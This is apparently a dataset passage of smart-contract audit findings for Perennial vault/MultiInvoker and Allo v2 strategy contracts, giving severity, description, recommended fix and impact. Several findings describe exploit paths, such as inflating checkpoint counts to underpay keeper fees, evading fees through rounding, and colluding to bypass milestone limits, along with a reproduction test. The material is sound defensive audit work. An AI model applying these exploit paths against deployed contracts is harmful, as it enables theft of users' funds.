10003346584\n```\n\nSo the user2 inflates his deposited amounts by paying smaller keeper fee.\n\nIf 2 lines which inflate checkpoint count (after corresponding comment) are deleted, then the output is:\n```\ncheckpoint count = 1\nUser shares:10000000000 assets: 9990218973\nUser2 shares:9999780702 assets: 9989999890\n```\n\nSo if not inflated, user2 pays correct amount and has roughly the same assets as user1 after his deposit.чConsider reverting (0,0,0) vault updates, or maybe redirecting to `settle` in this case. Additionally, consider updating checkpoint only if `depositAssets` or `redeemShares` are not zero:\n```\nif (!depositAssets.isZero() || !redeemShares.isZero())\n context.currentCheckpoint.update(depositAssets, redeemShares);\n```\nчMalicious vault user can inflate `checkpoint.count` to pay much smaller keeper fee than they should at the expense of the other vault users.ч```\n// invariant\n// @audit operator - pass\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\n revert VaultNotOperatorError();\n// @audit 0,0,0 is single-sided - pass\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\n revert VaultNotSingleSidedError();\n// @audit depositAssets == 0 - pass\nif (depositAssets.gt(_maxDeposit(context)))\n revert VaultDepositLimitExceededError();\n// @audit redeemShares == 0 - pass\nif (redeemShares.gt(_maxRedeem(context)))\n revert VaultRedemptionLimitExceededError();\n// @audit depositAssets == 0 - pass\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\n revert VaultInsufficientMinimumError();\n// @audit redeemShares == 0 - pass\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\n revert VaultInsufficientMinimumError();\n// @audit since this will be called by **different** users in the same epoch, this will also pass\nif 
(context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n -MultiInvoker liquidation action will revert most of the time due to incorrect closable amount initializationчmediumч`MultiInvoker` calculates the `closable` amount in its `_latest` function incorrectly. In particular, it doesn't initialize `closableAmount`, so it's set to 0 initially. It then scans pending positions, settling those which should be settled, and reducing `closableAmount` if necessary for remaining pending positions:\\n```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if 
(oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n\\nNotice, that `closableAmount` is initialized to `previousMagnitude` only if there is at least one position that needs to be settled. However, if `local.latestId == local.currentId` (which is the case for most of the liquidations - position becomes liquidatable due to price changes without any pending positions created by the user), this loop is skipped entirely, never setting `closableAmount`, so it's incorrectly returned as 0, although it's not 0 (it should be the latest settled position magnitude).\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? 
UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\nчInitialize `closableAmount` to previousMagnitude:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n+ closableAmount = previousMagnitude;\\n```\\nчAll `MultiInvoker` liquidation actions will revert if trying to liquidate users without positions which can be settled, which can happen in 2 cases:\\nLiquidated user doesn't have any pending positions at all (local.latestId == local.currentId). This is the most common case (price has changed and user is liquidated without doing any actions) and we can reasonably expect that this will be the case for at least 50% of liquidations (probably more, like 80-90%).\\nLiquidated user does have pending positions, but no pending position is ready to be settled yet. 
For example, if liquidator commits unrequested oracle version which liquidates user, even if the user already has pending position (but which is not yet ready to be settled).\\nSince this breaks important `MultiInvoker` functionality in most cases and causes loss of funds to liquidator (revert instead of getting liquidation fee), I believe this should be High severity.ч```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // 
process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n -MultiInvoker liquidation action will revert due to incorrect closable amount calculation for invalid oracle versionsчmediumч`MultiInvoker` calculates the `closable` amount in its `_latest` function. This function basically repeats the logic of `Market._settle`, but fails to repeat it correctly for the invalid oracle version settlement. When invalid oracle version is settled, `latestPosition` invalidation should increment, but the `latestPosition` should remain the same. This is achieved in the `Market._processPositionLocal` by adjusting `newPosition` after invalidation before the `latestPosition` is set to newPosition:\\n```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n\\nHowever, `MultiInvoker` doesn't adjust the new position and simply sets `latestPosition` to new position both when oracle is valid or invalid:\\n```\\nif (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\nlatestPosition.update(pendingPosition);\\n```\\n\\nThis leads to incorrect value of `closableAmount` afterwards:\\n```\\npreviousMagnitude = latestPosition.magnitude();\\nclosableAmount = previousMagnitude;\\n```\\n\\nFor example, if `latestPosition.market = 10`, `pendingPosition.market = 0` and pendingPosition has invalid oracle, then:\\n`Market` will invalidate (latestPosition.invalidation.market = 10), adjust (pendingPosition.market = 10), set `latestPosition` to new `pendingPosition` (latestPosition.maker = pendingPosition.maker = 10), so `latestPosition.maker` correctly remains 10.\\n`MultiInvoker` will invalidate (latestPosition.invalidation.market = 10), and immediately set 
`latestPosition` to `pendingPosition` (latestPosition.maker = pendingPosition.maker = 0), so `latestPosition.maker` is set to 0 incorrectly.\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\nчBoth `Market` and `MultiInvoker` handle position settlement for invalid oracle versions incorrectly (Market issue with this was reported separately as it's completely different), so both should be fixed and the fix of this one will depend on how the `Market` bug is fixed. The way it is, `MultiInvoker` correctly adjusts pending position before invalidating `latestPosition` (which `Market` fails to do), however after such action `pendingPosition` must not be adjusted, because it was already adjusted and new adjustment should only change it by the difference from the last invalidation. 
The easier solution would be just not to change `latestPosition` in case of invalid oracle version, so the fix might be like this (just add else):\\n```\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n else latestPosition.update(pendingPosition);\\n```\\n\\nHowever, if the `Market` bug is fixed the way I proposed it (by changing `invalidate` function to take into account difference in invalidation of `latestPosition` and pendingPosition), then this fix will still be incorrect, because `invalidate` will expect unadjusted `pendingPosition`, so in this case `pendingPosition` should not be adjusted after loading it, but it will have to be adjusted for positions not yet settled. So the fix might look like this:\\n```\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n- pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n- latestPosition.update(pendingPosition);\\n+ else {\\n+ pendingPosition.adjust(latestPosition);\\n+ latestPosition.update(pendingPosition);\\n+ }\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n+ pendingPosition.adjust(latestPosition);\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n```\\nчIf there is an invalid oracle version during pending position settlement in `MultiInvoker` liquidation action, it will incorrectly revert and will cause loss of 
funds for the liquidator who should have received liquidation fee, but reverts instead.\\nSince this breaks important `MultiInvoker` functionality in some rare edge cases (invalid oracle version, user has unsettled position which should settle during user liquidation with `LIQUIDATION` action of MultiInvoker), this should be a valid medium finding.ч```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n -Invalid oracle version can cause the vault to open too large and risky position and get liquidated due to using unadjusted global current positionчmediumч`StrategyLib._loadContext` for the market loads `currentPosition` as:\\n```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n\\nHowever, this is unadjusted position, so its value is incorrect if invalid oracle version happens while this position is pending.\\nLater on, when calculating minimum and maxmium positions enforced by the vault in the market, they're calculated in _positionLimit:\\n```\\nfunction _positionLimit(MarketContext memory context) private pure returns (UFixed6, UFixed6) {\\n return (\\n // minimum position size before crossing the net position\\n context.currentAccountPosition.maker.sub(\\n context.currentPosition.maker\\n .sub(context.currentPosition.net().min(context.currentPosition.maker))\\n .min(context.currentAccountPosition.maker)\\n .min(context.closable)\\n ),\\n // maximum position size before crossing the maker limit\\n context.currentAccountPosition.maker.add(\\n context.riskParameter.makerLimit\\n .sub(context.currentPosition.maker.min(context.riskParameter.makerLimit))\\n )\\n );\\n}\\n```\\n\\nAnd the target maker size for the market is set in allocate:\\n```\\n(targets[marketId].collateral, targets[marketId].position) = (\\n 
Fixed6Lib.from(_locals.marketCollateral).sub(contexts[marketId].local.collateral),\\n _locals.marketAssets\\n .muldiv(registrations[marketId].leverage, contexts[marketId].latestPrice.abs())\\n .min(_locals.maxPosition)\\n .max(_locals.minPosition)\\n);\\n```\\n\\nSince `context.currentPosition` is incorrect, it can happen that both `_locals.minPosition` and `_locals.maxPosition` are too high, the vault will open too large and risky position, breaking its risk limit and possibly getting liquidated, especially if it happens during high volatility.чAdjust global current position after loading it:\\n```\\n context.currentPosition = registration.market.pendingPosition(global.currentId);\\n+ context.currentPosition.adjust(registration.market.position());\\n```\\nчIf invalid oracle version happens, the vault might open too large and risky position in such market, potentially getting liquidated and vault users losing funds due to this liquidation.ч```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n -`QVSimpleStrategy` never updates `allocator.voiceCredits`.чhighч```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n\\n```\\n function _hasVoiceCreditsLeft(uint256 _voiceCreditsToAllocate, uint256 _allocatedVoiceCredits)\\n internal\\n view\\n override\\n returns (bool)\\n {\\n return _voiceCreditsToAllocate + _allocatedVoiceCredits <= maxVoiceCreditsPerAllocator;\\n }\\n```\\n\\nThe problem is that `allocator.voiceCredits` is always zero. Both `QVSimpleStrategy` and `QVBaseStrategy` don't update `allocator.voiceCredits`. 
Thus, allocators can cast more votes than `maxVoiceCreditsPerAllocator`.чUpdates `allocator.voiceCredits` in `QVSimpleStrategy._allocate`.\\n```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n// Add the line below\\n allocator.voiceCredits // Add the line below\\n= voiceCreditsToAllocate;\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\nчEvery allocator has an unlimited number of votes.ч```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n -`recipientsCounter` should start from 1 in `DonationVotingMerkleDistributionBaseStrategy`чhighч```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n 
_setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n\\n```\\n function _getUintRecipientStatus(address _recipientId) internal view returns (uint8 status) {\\n // Get the column index and current row\\n (, uint256 colIndex, uint256 currentRow) = _getStatusRowColumn(_recipientId);\\n\\n // Get the status from the 'currentRow' shifting by the 'colIndex'\\n status = uint8((currentRow >> colIndex) & 15);\\n\\n // Return the status\\n return status;\\n }\\n```\\n\\n```\\n function _getStatusRowColumn(address _recipientId) internal view returns (uint256, uint256, uint256) {\\n uint256 recipientIndex = recipientToStatusIndexes[_recipientId];\\n\\n uint256 rowIndex = recipientIndex / 64; // 256 / 4\\n uint256 colIndex = (recipientIndex % 64) * 4;\\n\\n return (rowIndex, colIndex, statusesBitMap[rowIndex]);\\n }\\n```\\n\\n```\\n /// @notice The total number of recipients.\\n uint256 public recipientsCounter;\\n```\\n\\nConsider the following situation:\\nAlice is the first recipient to call `registerRecipient`\\n```\\n// in _registerRecipient\\nrecipientToStatusIndexes[Alice] = recipientsCounter = 0;\\n_setRecipientStatus(Alice, uint8(Status.Pending));\\nrecipientsCounter++\\n```\\n\\nBob calls `registerRecipient`.\\n```\\n// in _getStatusRowColumn\\nrecipientToStatusIndexes[Bob] = 0 // It would access the status of Alice\\n// in _registerRecipient\\ncurrentStatus = _getUintRecipientStatus(recipientId) = Status.Pending\\ncurrentStatus != uint8(Status.None) -> no new application is recorded in the pool.\\n```\\n\\nThis implementation error means the pool can only record the first application.чMake the counter start from 1. 
There are two methods to fix the issue.\\n\\n```\\n /// @notice The total number of recipients.\\n// Add the line below\\n uint256 public recipientsCounter;\\n// Remove the line below\\n uint256 public recipientsCounter;\\n```\\n\\n\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n// Add the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter // Add the line below\\n 1;\\n// Remove the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter// Add the line below\\n// Add the line below\\n;\\n …\\n }\\n```\\nчч```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit 
UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n -`Registry.sol` generate clone `Anchor.sol` never work. Profile owner cannot use their `Anchor` walletчhighчAdd this test to `Registry.t.sol` test file to reproduce the issue.\\n```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(\"registry address: %s\", address(registry()));\\n console.log(\"anchor address: %s\", profile.anchor);\\n console.log(\"anchor.registry: %s\", address(_anchor.registry()));\\n\\n emit log_named_bytes32(\"profile.id\", profile.id);\\n emit log_named_bytes32(\"anchor.profile.id\", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,\"wrong anchor registry\");\\n }\\n```\\n\\nWhat happen with `Anchor.sol` is it expect `msg.sender` is `Registry` contract. But in reality `msg.sender` is a proxy contract generated by Solady during `CREATE3` operation.\\n```\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);//@audit H Registry address here is not Registry. msg.sender is a proxy contract. Create3 deploy 2 contract. one is proxy. other is actual bytecode.\\n profileId = _profileId;\\n }\\n```\\n\\nThis can be seen with Solady comment for proxy contract. `msg.sender` above is middleman proxy contract. Not `Registry` contract. Solady generate 2 contract during CREATE3 operation. One is proxy contract. 
Second is actual bytecode.чMove `msg.sender` into constructor parameter\\n```\\nFile: allo-v2\\contracts\\core\\Registry.sol\\n bytes memory creationCode = abi.encodePacked(type(Anchor).creationCode, abi.encode(_profileId, address(this))); //@audit fix creation code\\n\\n // Use CREATE3 to deploy the anchor contract\\n anchor = CREATE3.deploy(salt, creationCode, 0); \\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n constructor(bytes32 _profileId, address _registry) {\\n registry = Registry(_registry);\\n profileId = _profileId;\\n }\\n```\\nч`Anchor.execute()` function will not work because `registry` address point to empty proxy contract and not actual `Registry` so all call will revert.\\n```\\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n```\\n\\nProfile owner cannot use their wallet `Anchor`. 
All funds send to this `Anchor` contract will be lost forever.ч```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(\"registry address: %s\", address(registry()));\\n console.log(\"anchor address: %s\", profile.anchor);\\n console.log(\"anchor.registry: %s\", address(_anchor.registry()));\\n\\n emit log_named_bytes32(\"profile.id\", profile.id);\\n emit log_named_bytes32(\"anchor.profile.id\", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,\"wrong anchor registry\");\\n }\\n```\\n -`fundPool` does not work with fee-on-transfer tokenчmediumчIn `_fundPool`, the parameter for `increasePoolAmount` is directly the amount used in the `transferFrom` call.\\n```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n\\nWhen `_token` is a fee-on-transfer token, the actual amount transferred to `_strategy` will be less than `amountAfterFee`. Therefore, the current approach could lead to a recorded balance that is greater than the actual balance.чUse the change in `_token` balance as the parameter for `increasePoolAmount`.ч`fundPool` does not work with fee-on-transfer tokenч```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n -Exponential Inflation of Voice Credits in Quadratic Voting StrategyчmediumчIn the given code snippet, we observe a potential issue in the way voice credits are being accumulated for each recipient. 
The specific lines of code in question are:\\n```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n\\nWe can see that at the end :\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] = _allocator.voiceCreditsCastToRecipient[_recipientId] + _voiceCreditsToAllocate + _allocator.voiceCreditsCastToRecipient[_recipientId];\\n```\\n\\nHere, totalCredits accumulates both the newly allocated voice credits (_voiceCreditsToAllocate) and the credits previously cast to this recipient (creditsCastToRecipient). 
Later on, this totalCredits is added again to `voiceCreditsCastToRecipient[_recipientId]`, thereby including the previously cast credits once more\\nProof of Concept (POC):\\nLet's consider a scenario where a user allocates credits in three separate transactions:\\nTransaction 1: Allocates 5 credits\\ncreditsCastToRecipient initially is 0\\ntotalCredits = 5 (5 + 0)\\nNew voiceCreditsCastToRecipient[_recipientId] = 5\\nTransaction 2: Allocates another 5 credits\\ncreditsCastToRecipient now is 5 (from previous transaction)\\ntotalCredits = 10 (5 + 5)\\nNew voiceCreditsCastToRecipient[_recipientId] = 15 (10 + 5)\\nTransaction 3: Allocates another 5 credits\\ncreditsCastToRecipient now is 15\\ntotalCredits = 20 (5 + 15)\\nNew voiceCreditsCastToRecipient[_recipientId] = 35 (20 + 15)\\nFrom the above, we can see that the voice credits cast to the recipient are exponentially growing with each transaction instead of linearly increasing by 5 each timeчCode should be modified to only add the new voice credits to the recipient's tally. 
The modified line of code should look like:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] += _voiceCreditsToAllocate;\\n```\\nчExponential increase in the voice credits attributed to a recipient, significantly skewing the results of the voting strategy (if one recipient receives 15 votes in one vote and another one receives 5 votes 3 times, the second one will have 20 votes and the first one 15). Over time, this could allow for manipulation and loss of trust in the voting mechanism and the percentage of amount received by recipients as long as allocations are used to calculate the match amount they will receive from the pool amount.ч```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n -RFPSimpleStrategy milestones can be set multiple timesчmediumчThe `setMilestones` function in `RFPSimpleStrategy` contract checks if `MILESTONES_ALREADY_SET` or not by `upcomingMilestone` index.\\n```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nBut `upcomingMilestone` increases only after distribution, and until this time will always be equal to 0.
pool state or be used with malicious intentions.\\nTwo managers accidentally set the same milestones. Milestones are duplicated and can't be reset, the pool needs to be recreated.\\nThe manager, in cahoots with the recipient, sets milestones one by one, thereby bypassing `totalAmountPercentage` check and increasing the payout amount.ч```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n -Allo#_fundPoolчmediumчLet's see the code of the `_fundPool` function:\\n```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n\\nThe `feeAmount` is calculated as follows:\\n```\\nfeeAmount = (_amount * percentFee) / getFeeDenominator();\\n```\\n\\nwhere `getFeeDenominator` returns `1e18` and `percentFee` is represented like that: `1e18` = 100%, 1e17 = 10%, 1e16 = 1%, 1e15 = 0.1% (from the comments when declaring the variable).\\nLet's say the pool uses a token like GeminiUSD which is a token with 300M+ market cap, so it's widely used, and `percentFee` == 1e15 (0.1%)\\nA user could circumvent the fee by depositing a relatively small amount. In our example, he can deposit 9 GeminiUSD. In that case, the calculation will be: `feeAmount = (_amount * percentFee) / getFeeDenominator() = (9e2 * 1e15) / 1e18 = 9e17/1e18 = 9/10 = 0;`\\nSo the user ends up paying no fee. 
